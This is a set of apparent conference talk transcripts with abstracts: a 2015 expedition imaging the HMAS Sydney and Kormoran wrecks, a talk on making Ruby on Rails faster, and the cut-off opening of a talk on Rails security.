was out of the normal shipping lanes. Cutting a long story short, basically a very short and violent action occurred resulting in the sinking of both vessels. This is the crew of the HMAS Sydney just after it had a very glorious win in the Mediterranean. Most of these crew, but certainly all of the crew that were on the vessel at the time of the encounter with the Cormorant, perished 645 souls. Whereas on the Cormorant they were carrying 380 and of those 318 survived. So there was 70 years of controversy and rumour about what had actually happened on that day. The Sydney was on in radio silence at the time it went down, so there was no radio communication to indicate why it had gone missing. And when search party was sent out for it, the search parties only found German survivors. The two ships were found in 2008 by a consortium called the Finding Sydney Foundation and supported by a range of different contributors, including the federal government. The two vessels were found here on the West Australian coast. So Perth is way down here, Singapore is up here somewhere and the location where they were found was just here. They were planning, the Cormorant was planning on laying mines in this harbour here called Canarvon. And the locations, the exact locations of the two wrecks were found around 200 kilometres off the coast and around 20 kilometres apart from each other. So the action occurred obviously together and as part of the process that the Sydney sailed over the horizon away from the Cormorant which was disabled but eventually it sank as well. This is a side scan sonar image of the Cormorant site. The main wreck is sitting right here. There's a whole lot of debris in this region here which looks like just salt and pepper on a side sans sonar image and rather bizarrely the engine is sitting over here. The reason for this rather unusual arrangement of the site is that the Cormorant was carrying 300 sea mines and its crew scuttled the vessel before they abandoned ship and those sea mines went up in a huge explosion which just tore the vessel apart. The Cormorant, what's left of the Cormorant is about 40% of the vessel, the bow section sitting nicely upright on the sea floor but the rest of it is just this torn metal and just lots of little pieces. The Sydney is a very different site, bit more compact. The main hull is here, around probably 95% of the vessel is still in one piece. The bow is sitting upside down further up in the debris field about 300 metres away. The Sydney was hit by a torpedo from the Cormorant and that damage eventually led to the separation of the bow from the main hull and then there's a whole lot of other items on the sea floor which got essentially torn off the superstructure of the vessel as it went down. It's a very violent action, you might think of it being nice and gentle sinking process but no, it's actually quite violent with lots of movement and the items just being torn off the superstructure. So the 2008 expedition which found the two vessels, again they sunk in 1941 so it was almost 70 years before they were finally located, was very successful in its aim of finding the two vessels. They also sent an underwater vehicle down called an ROV and collected around 1500 images and around 40 hours of video and that information fed into a commission of inquiry which was ruled on the loss of the two vessels and one of the scientific organisations in Australia, DSTO also performed a detailed analysis on all the damage which was visible on the two vessels as well. When we went to look at the archive that was collected we realised that although it was useful for that purpose, for any subsequent purpose such as a museum exhibition or 3D processing, the still images were relatively low resolution, 5 megapixel but the lighting was relatively low so there was a lot of blurring as well and the video was only standard definition so 0.3 of a megapixel and the lighting again was not sufficient to provide good quality vision and that was also corrupted by noise and interference. So there was a desire from my colleague and myself, Andrew Hutchison and myself to mount a mission to return to the two wrecks to image them in considerable detail. So rolling forward to 2015, after four years of toil after the initial seed of the thought to conduct this project, we conducted the expedition in April, May of last year to return the two wrecks. Our aim was to image the wrecks in exquisite detail. It's an extremely rare and valuable opportunity to return to these two wrecks so we wanted to really image them in such detail in so many different ways that we would be able to generate lots of different data products from the project. Absolutely key to the project was this vessel here provided by an offshore oil and gas services company called Dof Subsea. This is the Scandi Protector, the latest in offshore oil and gas vessel, 100 berths, helicopter pad, huge back deck, huge crane and importantly for us, two underwater vehicles, wood class, the top of the range for their capability as well. The existing lighting and camera systems that are used on these vehicles for normal oil and gas operations were not quite the level and brightness and resolution that we were wanting for our mission. So I led the development of a very complicated custom lighting and camera system to be fitted to the front of both of these vehicles and I'll spend the next few slides going in detail through those. We also had a multi-beam sonar on the, on the, on the ROV, one of the ROVs as well which allowed us to capture images such as this. This is a multi-beam scan of the HMAS Sydney. You can see the torn off bow on this end here and this mission to return to the two wrecks also provided a unique opportunity to allow us to collect some science samples as well and we collected rusticles, we collected push cores, water samples and also some biological samples as well. The core project team were from Curtin University, Andrew Hutchison, myself, Joshua Hollick and Tim Meistwood from the Western Stran Museum led their activities, their involvement. So each of the two ROVs as I mentioned were equipped with a custom 3D imaging system. The ROV is what's sitting behind here. There's a, what looks a bit like a top hat sitting on the top here with, which is what's called a tether management system and there's a big reel of umbilical cable on there. The system that we attached to the front of these two vehicles consisted of 10 underwater LED lights. The ROV had three kilowatts of power available in its lighting circuit so we used all of that. And produced roughly 200,000 lumens of light. We also fitted seven digital steel cameras to the front of the vehicle. It's quite rare to have a, or a single digital steel camera on an ROV, surprisingly. So we had seven on each. Two 3D high definition video cameras. I should also mention that one of, or two of the digital steel cameras were mounted as a stereo pair. There's not enough plugs on a regular ROV for those mini cameras so we also had to have some subsea interface bottles. This one here is for interfacing all of the camera systems and these two housings here for the lighting distribution. All of that was mounted on a special frame. The frame was hydraulically controlled so that it could be either oriented vertically, for example when we were filming the hull of the vessel or it could be lent forward at 45 degrees when we were photographing the superstructure of the vessel or flying across the items in the debris field. Of course there was two of these. It was a hell of a lot of equipment and we had a scary amount of underwater cable as well that joined all of these different systems together. Now to go into a bit more detail into the camera systems that we used, I guess this is a bit like camera porn for stereographers. On the first ROV we had a Kongsberg Full HD 3D high definition video camera. On the second ROV we had a 3D high definition video camera from Bowtech. On both ROVs we had a secondary 3D high definition camera from a company called Subsea Imaging near Halifax in Canada. We also developed our own 3D digital still camera for the project as well. The top cameras provided a live 3D high definition feed up to the surface and those recorded continuously. We had boxes and boxes of hard drives. The second ROV cameras provided additional capability as well as redundancy in case we had a problem, we also had these ones provided 3D zoom, provided a standard definition preview to the surface but recorded internally so we had 47 hours of recording capacity on those. These particular cameras here were capturing a stereo pair every five seconds and were recording to internal memory as well. A little bit more of a look at each of the cameras here. The Kongsberg camera outputs what's known as a HD STI output, full high definition, 1920 x 1080. This one's got a lens separation of about 60mm and a 3000m depth rating. At this depth, 2,500m, it's a substantial pressure so you need high quality housings. This one here was made out of titanium. The camera from Bautek is a slightly wider lens separation, 76mm, fairly wide field of view, this one's rated for 4000m and again made of titanium. The cameras from Subsea Imaging, they're based on a Sony 3D camera module and that has a 32mm camera separation and one of these had a stainless steel housing and the other one had a titanium housing and again rated for roughly 3000m. And then this camera here, quite a bit heavier because it was made out of stainless steel, about 10kg in air but also rated for 3000m and captured images with about 75mm separation and 12MP resolution. So that's all the 3D cameras and then we also had these digital steel cameras as well. These are a 10MP digital steel camera also from Kongsburg. These cameras have an ethernet interface so we had full data control and download from the cameras. One of the aspects we were quite proud of, we developed some, more specifically my colleague Joshua Hollick, developed some customised code which allowed us to have real time download of raw images from the cameras in real time and everything was capturing digital steel images at 5 images per second and these also have zoom capability. And to that we also had some digital, wide angle digital steel cameras again at a 5 second interval and these ones were recording internally. And the wide angle provides additional 3D reconstruction geometry capability which I'll mention a little bit more a bit later. And the ROVs are outfitted with some existing video cameras as well so we were recording much of that content as well. So that's the subsea end up on the surface on the vessel. We had a control room. This particular room was empty when we arrived and within 12 hours we had all of this set up and running. So it's broken down into several stations or consoles. We've got a control system here or a control station here for the lights and cameras on ROV1. Three laptops controlling a range of different functions, controlling the lights, controlling the cameras and an image preview function here so we can see the images as they were downloading from the Ethernet connected cameras. And we also had a video preview of the other cameras and then a live high definition 3D video feed on this particular monitor here. Then that configuration was repeated here for the second ROV control station. Another station here for the high definition video recording and data storage. And then a third console over in the corner there for data validation and some initial data processing to ensure that the data we were collecting was up to scratch. Over behind this wall is the actual room where the ROVs themselves are flown. There's the control station for ROV1, two pilots and a whole lot of different video monitors showing all sorts of different video feeds and control status. On the other side of the room behind the camera is the control station for ROV2 and on the left is the navigation control station. So it's a bit like mission control. Of course gluing all of this equipment together was the crew. We had a wonderful team. We had 20 people part of the Curtin and WA Museum team running the imaging systems. There's another 20 people who run the ROVs and then another 20 or so people who run the vessel. So a team of approximately 63 on board. We're at sea for nine days. Four of those were actually diving on the two wrecks. So it was a very busy operation. Bringing this all together was a huge effort. We were very pleased with the amount of support we had from industry. So many different companies from the oil and gas industry were very keen to be involved. It was such a uniquely different project. What they would normally be working in, they were very keen to see their services and products being demonstrated in a non-oil and gas type of application. So the primary project partners were the Western Australian Museum, Curtin University, DoF Subsea who provided the vessel and we also received a grant from the federal government. So in terms of the results of the expedition, as I mentioned, we had two ROVs working for four days straight in the diving on the two vessels, 24-hour operations and we had 12-hour rotating shifts. Over that period of four days we surveyed both wreck hulls and also the sections of the debris fields. We had to carefully coordinate the movement of the two ROVs. Sometimes they were working together, sometimes working separately. So as I mentioned before, seven digital steel cameras on each ROV were capturing photos every five seconds and most of the time 3D high definition being captured from the two vehicles as well. So at the end of the mission we had over half a million photographs, around 300 hours of high definition video, much of that in 3D and about 50 terabytes of data we wheeled off the vessel. Now I'd like you to give you a little bit of an insight into some of the material we collected. We do have 3D for the moment, we do have much of this content in 3D but we're still going through the process of processing that data. This is the B turret on the HMAS Sydney. With this image here you can see the deadly accuracy of the German gunners and the top of the turret was blown off there and disabled that particular turret very quickly. This is the stern on the HMAS Sydney, you can see the other ROV working above it. It was quite a unique opportunity to have two ROVs working on site so you could actually film one ROV with the other ROV so you could provide context as to the actual operations that were taking place. You can see the compression damage that's occurred as the ship has sunk, it's become squeezed by the incredible pressure at that depth. This is looking into the guts of the torn off bow of the Sydney, looking over the shoulder of the ROV. You can see some of the anchor chains, the torn metal, you can even see some of the rusticles that you'll have a little bit more of a closer view there from a little bit later. You can see the lights on the ROV there and some of the cameras. So the bow, which is this section here, is sitting upside down on the sea floor. In contrast to the hull on the Sydney and the hull on the Cormorant, both of those are sitting upright whereas the bow is sitting upside down. This is an item from the debris field, it's a life raft, something called a Carly float. Obviously significantly degraded in 70 years. It's not something I would have wanted to have tried to survive in. It's essentially a wooden slatted floor which is connected to the buoyancy ring by a series of ropes. The bottom of your body would be essentially sitting in the water so your hypothermia would eventually set in very quickly. This is from the Cormorant, a very different site, quite pretty in some ways because of these sea anemones. We're still sort of working out our measurement accuracy but we think some of the large ones at least are in the order of 20 to 30 centimetres in diameter, almost alien like. You can see the original paintwork on the Cormorant. You can see some of the rusticles just there. The two ships are in amazingly good condition despite having been in the ocean for 70 years. That is in part due to the fact that they've been sitting so deep and the water at that depth is essentially very oxygen-starved. As I mentioned before, the Cormorant was carrying around 300 sea mines. Most of them were detonated when the ship was scuttled. This one obviously didn't. We kept our distance when we saw this one but took lots of photos. You can see that this sea mine itself has incurred some compression damage itself as it's sunk with the vessel. This is sitting on some of the torn up debris sitting in the debris field. This is my favourite image from the whole collection. This is one of the guns on the Cormorant. It shows the amazing clarity of the water that we were blessed with that day. It also shows the sharpness and the clarity of the photography. You can see what's called the rifling in the end of the barrel there that gives the projectile a spin at the end to improve its accuracy. It also shows a bit of the personality of the crew on board. They've named the gun Linda. There's also some German text around here which very roughly translates to mean victory for us and death to the enemy. Of course the skull and crossbones for added effect. We mentioned that we took a lot of photos. Why did we take so many photos? Well, it's for the process called 3D reconstruction. This technology is making so many inroads into so many fields. The plenary talk just earlier on optical coherence to optical coherent tomography. Also talked about using 3D reconstruction and it is a very capable and fast developing field. It's one of the technologies that we're making very good use of in this project. The purpose of 3D reconstruction is to generate 3D models from a series of 2D photographs. This image here shows one of the ship's boats. These were not life boats. These were intended to transfer personnel and stores between ship and shore. Each of these blue rectangles here with a black line sticking out of the back of it represents a camera image. So we flew the ROV down and went around it once. It's like doing a pirouette around the item and then also did a second one at a different height. So essentially we photo bombed the site. The process of 3D reconstruction is also known as 3D photogrammetry or structure from motion. It's primarily based on the use of still images but we can also use frame grabs from the video sequences as well to provide more coverage if we need it. So a shot of the same image just from a different angle. What we do need is lots of angles, good coverage to enable us to generate high quality models. So the actual technique of 3D reconstruction, let me tell you a little bit more about that. Every image has to have a process of features identified in the image. Then those features are matched between photographs. So every photograph is compared to every other photograph and each of these line segments here represent a matched feature in one image joined up with a matched feature from the other image. Those matches are then put through into an algorithm called a bundle adjustment which allows us to calculate where all the cameras were and also generate a very sparse point cloud. People often ask, did you have to have accurate tracking on the cameras and the power of this approach is no you don't. The positioning of the cameras is actually determined from the subject that you're filming. Assuming that the item that the subject you're filming is not moving, you can determine very accurately where the cameras are positioned when they were taking the photograph. From that, once we know the camera positions, we can then back calculate and perform a denser match and generate a much denser point cloud. So these are all points in 3D space. We can rotate that around and see all those points in 3D space. Another algorithm is then applied to produce a mesh over the surface of the point cloud and then finally the images from the cameras are laid back, projected onto those surfaces to provide a photographic texture to those models. So what you've got then is a very accurate digital 3D model of the item that you filmed and all of this process is fully automatic. So all of the 3D models you have seen in the documentary so far and I'll show you in a few moments are all completely automatic processed. We haven't done any post-processing or human in the loop at this stage but we will be using that approach to improve the quality of the models. So these are, this is actually two of the ship's boats sitting above each other. Once you've got a digital 3D model like this there's a lot you can do with it. You can produce a stereoscopic video like this. We can also go to techniques of 3D printing to generate physical reproductions of the artifacts from the seafloor. So you can see that the top boat has had a catastrophic collapse. There's another boat sitting over the back there. These aren't in accurate placement of the original location. Now we're flying across to a reconstruction of the bow of the Sydney and along here you can see some of the rusticles that are hanging off. This is all generated from the 3D models and if I had my supercomputers, not supercomputers but visualisation machines here we'd actually be able to fly through this in real time. It's quite an empowering process to be able to just fly through and just explain different items to people as they ask in quite an interactive experience. So we spent probably an hour and a half photographing just the bow. I think around 5,000 images and that's allowed a very complete model of the bow itself. The boats are showing quite a lot of degradation. They're made of wood so they are being eaten away and degraded very quickly. The Sydney itself though is remarkably good condition. So we're two from here. We've got lots of data processing ahead of us using the 3D reconstruction software. They're quite privileged to have access to the fastest public access supercomputer in the southern hemisphere just across the road from our university. It's called the Pauzy Supercomputer and we're using that to generate the 3D models of items from the debris field and also hopefully fingers crossed the full main hull of both wrecks. The results of the project will be developed into museum exhibitions which will be shown at the WA Museum. They've got several locations in Western Australia as well as partner institutions around Australia and we're also hopeful that there may well be some institutions in Germany that might be interested in taking it on. As I mentioned the 3D documentary feature that's been produced by Prospero Productions. There's also a range of research outputs to the project. A number of the aspects of this project are really on the bleeding edge and when I'm on bleeding edge I'm bleeding truthful as well. So the 3D reconstruction techniques and also the processing of the science samples are leading to some very solid research outputs as well. Thank you.
|
In April/May 2015, a team led by Curtin University, WA Museum and DOF Subsea conducted a 3D imaging survey of the two historic shipwrecks HMAS Sydney (II) and HSK Kormoran. The Australian vessel HMAS Sydney and the German vessel HSK Kormoran encountered each other in the midst of World War II on the 19th of November in 1941 off the Western Australian coast. After a fierce battle both ships sank each other and they now lie in 2500 m (8200 feet) water depth, 200 km (125 miles) offshore from Shark Bay. This event is Australia's largest loss of life in a single maritime disaster - with the entire crew of 645 perishing on the Sydney and 82 crew lost on the Kormoran. The exact location of the two wrecks remained unknown for almost 70 years until they were discovered in 2008. The aim of the 2015 expedition was to conduct a detailed 3D imaging survey of the two wrecks and their extensive debris fields. A custom underwater lighting and camera package was developed for fitment to two work-class underwater remotely operated vehicles (ROVs) as often used in the offshore oil and gas industry. The camera package included six 3D cameras, and fourteen digital still cameras fitted across the two ROVs intended to capture feature photography, cinematography and 3D reconstruction photography. The camera package included six underwater stereoscopic cameras (three on each ROV) which captured a mix of 3D HD video footage, 3D stills, and 3D 4K video footage. High light levels are key to successful underwater photography and the system used a suite of ten LED underwater lights on each ROV to achieve artistic and effective lighting effects. At the conclusion of four days of diving, the team had collected over 500,000 stills and over 300 hours of HD footage. The collected materials will contribute towards the development of museum exhibitions at the WA Museum and partner institutions, and the development of a feature documentary. Another key technology being deployed on this project is photogrammetric 3D reconstruction which allows the generation of photo-realistic digital 3D models from a series of 2D photographs. These digital 3D models can be visualised in stereoscopic 3D and potentially 3D printed in full-colour to create physical reproductions of items from the sea floor. This presentation will provide an overview of the expedition, a summary of the technology deployed, and an insight into the 3D imaging materials captured. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/31493 (DOI)
|
So, this talk is titled 3x Rails, but what does this title mean? This talk is about speeding up Rails framework, but I'm so sorry I kind of failed to bring something like, hi guys, I brought a magical patch that makes Ruby on Rails three times faster, so let's just merge this and release Rails 15 now. I kind of plan to do this on stage, but I'm sorry I failed. So instead I'd like to discuss some possibilities or points of view. So again, what does the title 3x mean? Actually this title is inspired by Matt's keynote at RubyKaigi last year and RubyConf I think. In that keynote, Matt promised that Ruby 3.0 is going to be three times faster than Ruby2. What's happening? So instead, it's actually so easy to make Ruby on Rails three times faster. So easy because everything we need to do is just don't make no more performance regression in the Rails side and wait for Ruby 3. Then run your Rails applications on Ruby 3. That obviously should be three times faster Rails. Yeah, win. So anyway, my name is Akira. I'm on internet as a Matsuda like this. I work on some open source projects like Ruby language and Rails framework. Also I authored and maintaining some gem libraries like Kaminarie, the Pozination library, active decorator, motorhead, state of full, et cetera, et cetera. And I run a local Ruby user group called Asakusa.rb in Tokyo. Asakusa.rb was established in 2008. We're meeting up on every Ruby Tuesday. And we had so far 356 meetups so far. So we have so many Ruby core committees in our members, like more than 30 people. And we had attendees from like about 20 different countries from all over the world. So it's quite a global local group, right? We welcome every visitor's from any other countries like, I mean countries that are not listed here. So if you're interested in visiting our user group and if you're having chance visiting Tokyo, please contact me and come to a meetup. Also I'm organizing a Ruby conference in Japan named Ruby Kaigi. Ruby Kaigi aims to be the most technical Ruby conference focusing on the Ruby language itself. Last year's Ruby Kaigi was like this. And this year we're having another Kaigi in September in Kyoto. Please know that the conference is not in Tokyo this year. Kyoto is an ancient capital of Japan. There remains so many historical temples and shrines, gardens and so on, like showed in these pictures. I just Googled Kyoto. This is the result. So I think Kyoto is the most beautiful city in Japan. So if you haven't been to Ruby Kaigi before and you're willing to, I think this year's one is a really good chance to enjoy both the conference and your trip. So please consider joining the conference. This year's venue looks like this. This is the picture of the main hall. The second hall and venue has nice looking garden, Japanese garden. So we're already selling the tickets and CFP is already open. So please check out this official website and submit your talk or buy your ticket. So anyway, let's begin the actual talk. As I told you, this talk is about speeding up the Rails framework, not your Rails application. To speed up software, firstly we need to know its speed. And in order to measure the speed, we usually use benchmarking software, like for example benchmark IPS or Ruby's built-in benchmark library. I prefer this benchmark IPS. For example, if you actually want to measure the performance of your Rails application, for example, you can do something like this. I made a monkey patch, monkey patching Rails application.call and we run benchmark IPS. It actually kind of runs the request like 100 times. I know it's horrible, horrible idea, but it kind of works. And it benchmarks purely the Rails part, right? I mean, it escapes the browser side. So this outputs some score. So how can we improve the score? That's the topic of today's talk. My first trial is of course Ruby GC because everyone knows that Ruby GC is so slow. I believe it just like stopping GC will improve a performance like 30%. So let's do this first. To observe the GC, we have GCStat in the core library and we have GCTracer which is made by Koichi. So for example, adding GCStat calls to the previous module. It shows something like this. It rates 45 times in five seconds. And it outputs some like GCStat result. It shows that it's surely GC is happening there like 50 times, right? So let's stop this. Like GC disabled. Then run the benchmark again. Then I got this result. 50 iterations per five seconds. So the GC adds about 10% overhead in this benchmark. I think because Ruby GC is improving recently like this, we had so many improvements on GC module. So GC is actually no more 30% overhead. It's like just about 10% overhead. Which is I think not a big deal. It's acceptable in my opinion. So I'd like to thank Koichi for doing this amazing work. Keep on doing this amazing work. And also thank you Heroku for supporting his activity. Thank you very much Koichi and Heroku. By the way, let me now talk a little bit more about Ruby 2.3 new feature. Somewhat concerning to the garbage collection. About strings. Stringes in Rails used to be a big concern of the community. And there actually was a trend like sending a pull request with.freeze,.freeze,.freeze,.freeze in Rails. And shows some micro benchmark. Which aims to make Rails faster. But honestly, I didn't like that kind of pull request. Because it kind of pollutes the code base. It just looks ugly to me. So I proposed a magic comment to Ruby to freeze all string.lilrules in the file. Just in order to stop the.freeze pull requests. It's like this frozen string.lilrules.true. It's already introduced in Ruby 2.3. It's already available. So if you're interested, you may try. Actually I haven't tried myself yet. Maybe this will add some performance. Several percent, three or five percent, I guess. Maybe. Anyway, let's stop caring about the strings now. It's already solved problem, I think. And another Ruby myth is Ruby is slow. Because it's a scripting language. We have to parse and compile every time. So it's slower than compiled language. Is it true? I think it is true. But Ruby 2.3 has new features. That you can pre-compile Ruby code into a binary. And you can load the binary. I'm not going to talk about this in detail because it's going to be described by Koichi, the implementer himself. So don't miss Koichi's talk tomorrow about this. So which part of our simple Rails application takes time? This profile. To measure the whole performance, I used a benchmarking software to profile which part is actually slow. We use profiling software like stack prof or RB line prof. But again, I'm not going to describe them in details in this presentation. Because you may have already known, heard of this and you may know these tools. These are so powerful and so popular. Maybe you may have heard of this before. And also we have TracePoint, which is a built-in library in Ruby. Koichi's work. You can simply count the number of method calls and you can hook into Ruby method call and put a hook into every method calls. So you can count the method calls like this. This is a sample example. Rack middleware that counts every method call happening inside that rack middleware stack. So with this middleware, I get this output from my scaffolded Rails application. The most happening method call is save buffer HTML save and HTML save, escape HTML, attribute something, things like this. However, these are just theories and I'm sorry, I'm going to talk something different today through my experience. And I know some like weird parts of Rails, weak parts of Rails, low parts of Rails. I'm going to talk about some of these in the rest of my time. So Rails consists of MVC. Which one do you think is the most heavy part? How about ActionPack, the C part? ActionPack sits on top of so many rack middlewares that would make the method call stack very deep. Maybe that would be a bottleneck. And actually Rails 5 introduces a new feature called Rails API in order to reduce this rack middleware depth, I think. So let's measure. This is a very, again, very roughly written rack middleware benchmarking tool. This outputs how long did it take for each rack middleware? And I got a result like this. Less than 0.0.0 something for every middleware. So it turns out there's no slow middleware in the default stack. I don't actually see any other particularly slow part in ActionPack, actually. Besides, Rails, Resolution, and Vora Hoppers, which I'm not going to talk about today. So let's leave ActionPack. And let's see this list again. There are some safe buffer things and escape HTML things, which is obviously ActionView. ActionView actually has some performance problems. I know that. So ActionView consists of roughly these processes. It looks up the template, compiles the template, and returns the HTML strings to the browser. So let's start with the template lookup. Current implementation of template looking up is like this. It calls directory glob for every single template lookup. So the resolver queries to the file system per each request, actually per each render, render layout, render partial, each render. All right. Couldn't we speed this up? So I tried to make more optimized resolver over the default optimized resolver. The concept is like this. Just read the whole file system once and cache that. Cache all the file names on template file names in memory. So this is the trial implementation, which is already on GitHub. This basically just scans through the view path directory only when the application got the first access. Then caches all the file names. Then it performs the view file name comparison in memory, as I told you. And here is the benchmark proving the speed. And the result is like this. My version of template resolver is 18 times faster than the default resolver. And very carefully crafted microbenchmark. So another issue, I think, is render partial. Render partial is basically slow because it creates another buffer per each render partial. But in some cases, we don't need a new view context for each partial, like simply rendering footer, header, et cetera. So we can do, we probably can do something like PHP include and simply concatenate the partial into the parent template. And the implementation is, I'm sorry, still work in progress. This wasn't very easy as I expected. So another idea is we can pass the full path file name into render partial call so that the template resolver doesn't have to look up all the view paths. The API will look like this, render path with a full path file name or render relative, like require relative in Ruby. The implementation is, again, not yet done. Another idea about rendering is render parallel. So we can parallelize render collection. So if you have 100 collection, maybe we can make the render collection 100 times faster with using threads. I actually tried this, but I saw so many, too many connections error for a Mac2 bracket. It's obvious. So this turns out to be a failure, I think. Another render method is render remote, which performs rendering via Ajax, particularly for a very heavy partial. Here's an implementation, which I did like two, three years ago. I found a repository. I looked at the repository like yesterday, but I forgot what does the name mean. Anyway, the API is like this. Very simple. Add remote true to your render call. Then this would perform the render partial call through the Ajax. It kind of already works. I'm sorry, but I'm not using it. So another topic is encoding support in template rendering. The current implementation of rendering the template into Ruby method is like this. It first doops the given template source, the whole template string, and forcing coding the source binary, sorry, the source text to binary, and doops the given template source again for detecting the magic comment, encoding magic comment, then forcing coding again. For some reason. And finally, encode in ERB. So many like encoding conversions. But who needs this feature? Who actually writes a non-UTF view file in your application? If any one of you does, please raise your hand. Wow. No? No? Okay. So nobody in this room actually does use this feature. Actually we, sorry. Okay. That might be possible, I think. But the actual use case is probably for Japanese people. Because I see test cases like Shift GIS, which I think is written by Yohuda. But I'm sure nobody does this in Japan. It's just ridiculous. So the current state is nobody needs this feature. So we just can remove this. So here's my suggestion. Let's do this. So here's a benchmark for this new version of ERB handler. And this is the result. It kind of shows some improvement, but only one time five percent, one time five time, one point five time faster. Because in this case, it includes the whole compilation process in the ERB side, not just the encoding conversions. And moreover, this would reduce the memory consumption, I suppose. So let's profile that with memory profiler. The code looks like this. Benchmarking the memory consumption in, again, the benchmark IPS. Inside the block that repeats the whole, like, template resolution. And the result is like this. It kind of shows some memory reduce in string objects. And in my opinion, memory usage is very important. It's about speed, actually. Because if we could reduce this, then we could put more containers, I mean, web workers in the web application container. So this really is about speed, right? So I'd like to propose removing the encoding support, maybe in rail six. So by the way, this is about the ERB handler. So if you're using Hamel, we have some alternative implementations like this. So please try using these instead of the official Hamel. The next topic is active support safe buffer. As we saw in the method calls graph, we call this so many times, which is currently a very ad hoc implementation. It has a flag inside the string object and flips the flag on and off. So I tried to use Ruby's built-in tainted flag, but I failed. But maybe we could make a faster version of safe buffer somehow, maybe in C extension, I guess. The next topic is IITNN. Sorry, I have only five more minutes, so I'll speed up my talk. Again, it's not yet done, but I have some work in progress in this machine, which probably I'll publish within a few days. The next topic is active record, and I have 40 minutes for active record. So my main concern about active record is aerial objects when building queries. It just builds so many aerial objects, aerial node objects. So what if we directly build SQL strings from the find or where parameters for very simple queries, like just where name equals to something or find by ID? It's still not published, but it's almost working. And the product is called Array9. So this is the implementation, the example. If the find call accepts some complex parameters, then it will pass the query to super. But for the simple ones, like find by ID or find by ID string, it directly compiles the SQL query. This is actually very cheap. It's cheaper than compiling the cache. The aerial node cache for what's that? What's the name? Adequate record. I'm going to skip this part. So my next topic is model present. My advice about model present is never, do never hit model present because it causes massive method calls inside. If you call, for example, current user present, how many method call will occur? So this is the answer. I see 85 method calls just for user.present, which is ridiculous. So I suggested a patch fixing this situation, but this bit turns out because the Rails core team expects you not to do this. So please don't call present method on your active record model or put something like this in your application. I think I have no time running through all these slides. But this is about speeding up the Rails size initializers. This is about don't require pry doc, pry, by bug, pry anything in your gem file. This is about squashing all bundle gem files into one directory, which is currently not yet working. Using require relative instead of require, which didn't show any significant speed improvement. Like detecting autoload, which causes some speed regression in production environment. Actually I found two occurrences of autoload in production in Rails 5, which happens inside rack 2, so please fix this error. Speeding up test. Previously our application took one minute on CircleCI just for preparing the schema, converting 600 tables into the schema migration. So I changed this to this one single query, which makes, in our case, 600 times faster. This is already committed into Rails 5. So it's available in Rails 5. Some slow parts in active support, like multibyte time zones. So like multibyte. It consists of multibyte charts and multibyte Unicode. It loads the whole Unicode database version 8, which sits inside active support library, but it's actually need this, I'm not sure. And I suppose at least we Japanese don't use this. So we can just remove this in our case and make the framework smaller and make the boot time faster. The next one is time with zone. Here's a benchmark for a time versus time with zone. What is time with zone is 25 times slower than the built-in time. So if you're sure you don't need time with zone, you just can replace your time with zone into time. I mean, if you're 100% sure what you're doing. We can also boost some slow parts of Rails with C extensions. Here are some examples like CGI, SCI, SCI HTML, fast blank, hash within different Xs. Some of these are already introduced into recent versions of Ruby. So please just use new versions of Ruby, which will bring you the speed. Okay, sorry for the time over, conclusion. So there is really no one single performance like bottleneck for everyone, for every Rails application. Some apps might have 1,000 models, some apps might have 3,000 lines of Rails RB, and the bottlenecks will change. So in my opinion, Rails is a MacaSe, which is nice, but in some cases we want to customize certain points of Rails framework. Maybe what we need is more flexibility like MIRB used to have. So there are so many slow parts in Rails, and there can be more alternatives to these parts of Rails. So I would suggest to make Rails more flexible, to be like MIRB a little bit, and I hope everyone here to reveal your hack and bring more modularity, diversity into the Rails community. Okay, thank you. Thank you very much. Okay, good.
|
Matz declared that the next major version of Ruby is going to be 3x faster than Ruby But how can we make a software 3x faster? Can we do that for Rails? In this session, we will discuss the ways to survey performance hotspots in each layer of the framework, tuning techniques on the performance issues, and some actual works that you can apply to your apps. Topics to be covered: Speeding up DB queries and model initialization View rendering and template lookup Routes and URLs Object allocations and GC pressure Faster Rails boot and testing Asset Pipeline tweaks.
|
10.5446/31587 (DOI)
|
We have like three minutes before we're supposed to start, but like who was here for Mike's talk just a few minutes ago? Okay. So this is like part two. Just when you thought it was safe to go back on the web. So Mike, you know, he covered some specific problems and then like some breaches that have happened. And when I, this was like, you know, a week ago or so, I saw, like I knew he was speaking and I've known him. We use their product. So I send him an email and I was like, hey, actually your talk sounds really similar to my talk. You're like talking about breaches that have happened and I thought I'd go through some real things that have been found. And I was like, here's my list of things that I might talk about. Does this conflict with anything you're talking about? And I couldn't believe it. He wrote me back and he's like, I'm not talking about any of those. Although he did kind of lie because he mentioned Ashley Madison, but he didn't really talk about it. So if you were in that talk, this is kind of like a similar talk except sort of the details of vulnerabilities that have been found in different people's sites. So if you were, in case you were curious about this talk versus that talk. Also I just like to talk. So when I get up here, I like to talk. We have one minute before officially supposed to start. I like to use vacation pictures now for my title slides and this is Meteor Creator in Arizona. It's actually the first creator that anyone actually figured out came from a meteor. In fact, for a long time they thought it was like a volcanic thing. So yeah, this is, in case you're wondering, it's pretty big. I don't remember exactly how big, but it's pretty big. There you go. Yep, yep, yep. No, no, it's not that big. Well, so you would have to have detection, right, and then you would probably have to have some way of avoiding it or deflecting it, right? All right, so I should start the real talk. My name is Justin Collins, at President Beef on Twitter and most of the Internet. I wanted to give this talk. I've actually heard people say phrases very similar to this. In fact, I heard at least one person say it this week. Not quite like, you know, I believe Rails is going to do everything for me, but sort of that question of like, well, but isn't Rails pretty good at security? Doesn't it kind of do a lot of stuff for me? And so I thought it was a good title for this talk. And so the question is, doesn't Rails take care of security for me? The answer, no, it doesn't. And that's all I have. Thank you. This is... I would have put up pictures of my cats, but everyone does that and mine are not as funny looking as Aaron, so here's my turtle instead. Okay, so some more details, I would guess. I hate doing these slides, but it's somewhat relevant. This is... I believe Snapchat shows you your soul, so this is what my soul looks like. I've been doing application security for about six years and working on Breakman open source project for essentially the same amount of time. Last couple years working on Breakman Pro, if you just need to be more professional about your security tools. If you really like Breakman, but you don't feel like you need the Pro version, but you want to support Breakman, you can buy licenses for Breakman Pro and you don't have to use them, but you can buy them and that will support the open source project. Okay, so that's all I'm... That's the sales pitch. Okay, so this talk, I already kind of told you what it was, but if you're looking for what Rails does give you and what Rails does not give you, I gave a talk last year. That was the vacation to the Grand Canyon about kind of the security things that Rails does well, things that doesn't do well, things I wish it would do better. Then Brian Helmkamp a couple years before that gave a talk about Rails insecure defaults, some of which have changed in the meantime, so that's good. So if you're interested kind of in that topic, which is not what this talk is about, you could watch those. In between those two talks, I did a talk with Aaron Bedra and Matt Konda, where we kind of did a hypothetical scenario where we acted out like, oh, we're developers and we wrote really 